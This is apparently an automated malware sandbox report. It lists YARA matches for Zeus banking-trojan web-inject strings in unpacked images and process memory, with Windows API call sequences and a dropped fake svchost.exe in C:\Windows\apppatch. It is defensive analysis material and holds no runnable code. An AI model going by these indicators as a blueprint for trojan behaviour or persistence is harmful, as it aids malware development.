    Source: 2.3.svchost.exe.2c70000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 26.2.tGYLgZxMWmmBTD.exe.12e2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.3.arxtPs1STE.exe.780618.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.28.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.44.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 9.2.tGYLgZxMWmmBTD.exe.27c2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2ab0000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.36.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 9.2.tGYLgZxMWmmBTD.exe.27c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 5.2.tGYLgZxMWmmBTD.exe.8d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.4190000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.34.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.tGYLgZxMWmmBTD.exe.2d60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.46.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.tGYLgZxMWmmBTD.exe.29b2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.43.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.45.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2a02000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 24.2.tGYLgZxMWmmBTD.exe.9d2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.11.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.38.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.883000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.2bb0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.arxtPs1STE.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 17.2.tGYLgZxMWmmBTD.exe.e12000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 20.2.tGYLgZxMWmmBTD.exe.2172000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.12.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.2.svchost.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 6.2.tGYLgZxMWmmBTD.exe.822000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.tGYLgZxMWmmBTD.exe.d72000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 31.2.tGYLgZxMWmmBTD.exe.29b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 34.2.tGYLgZxMWmmBTD.exe.2742000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.3f90000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.7.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 13.2.tGYLgZxMWmmBTD.exe.dd0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 22.2.tGYLgZxMWmmBTD.exe.1222000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.883000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.arxtPs1STE.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 24.2.tGYLgZxMWmmBTD.exe.9d2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.4190000.9.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.47.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 2.3.svchost.exe.2c70000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: arxtPs1STE.exe PID: 7600, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: svchost.exe PID: 7652, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7376, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7352, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7328, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7304, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7280, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7256, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7232, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7212, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 7188, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 344, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 3964, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 1080, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Process Memory Space: tGYLgZxMWmmBTD.exe PID: 3872, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: Yara match, File source: 2.3.svchost.exe.883000.4.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 0.2.arxtPs1STE.exe.400000.2.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 2.3.svchost.exe.883000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 0.2.arxtPs1STE.exe.400000.2.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 0.3.arxtPs1STE.exe.77b218.0.raw.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara match, File source: 00000002.00000003.1403293254.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match, File source: 00000002.00000003.1402494872.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match, File source: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
    Source: Yara match, File source: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
    Source: Yara match, File source: 00000000.00000003.1390809231.000000000077B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match, File source: Process Memory Space: arxtPs1STE.exe PID: 7600, type: MEMORYSTR
    Source: Yara match, File source: Process Memory Space: svchost.exe PID: 7652, type: MEMORYSTR
    Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BB3A20 VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
    Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BB79E0 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Code function: 5_2_008D3A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Code function: 6_2_00883A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe, Code function: 9_2_02BD3A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, Code function: 0_2_004021D0: CreateFileA,DeviceIoControl,CloseHandle
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, Code function: 0_2_004018E0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, File created: C:\Windows\apppatch\svchost.exe
    Source: C:\Users\user\Desktop\arxtPs1STE.exe, File created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATA
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C042509_2_02C04250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C182139_2_02C18213
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C103C09_2_02C103C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD2BA09_2_02BD2BA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0E3909_2_02C0E390
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDE3E09_2_02BDE3E0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0CBA09_2_02C0CBA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD8B509_2_02BD8B50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0D8009_2_02C0D800
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C068109_2_02C06810
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C048309_2_02C04830
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD89309_2_02BD8930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0F6209_2_02C0F620
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C066309_2_02C06630
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BF87809_2_02BF8780
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C117809_2_02C11780
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0BF409_2_02C0BF40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C05CD09_2_02C05CD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0FCF09_2_02C0FCF0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0A4809_2_02C0A480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C144A09_2_02C144A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BED5709_2_02BED570
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F7A309_2_027F7A30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02800A209_2_02800A20
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FD3409_2_027FD340
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027E9B809_2_027E9B80
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_028058A09_2_028058A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_028010F09_2_028010F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F70D09_2_027F70D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FB8809_2_027FB880
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027DE9709_2_027DE970
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F56509_2_027F5650
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02802EDD9_2_02802EDD
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_028096139_2_02809613
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F06D09_2_027F06D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FC6D09_2_027FC6D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027C9F509_2_027C9F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_028017C09_2_028017C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027CF7E09_2_027CF7E0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027C3FA09_2_027C3FA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FDFA09_2_027FDFA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FF7909_2_027FF790
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F5C309_2_027F5C30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F7C109_2_027F7C10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FEC009_2_027FEC00
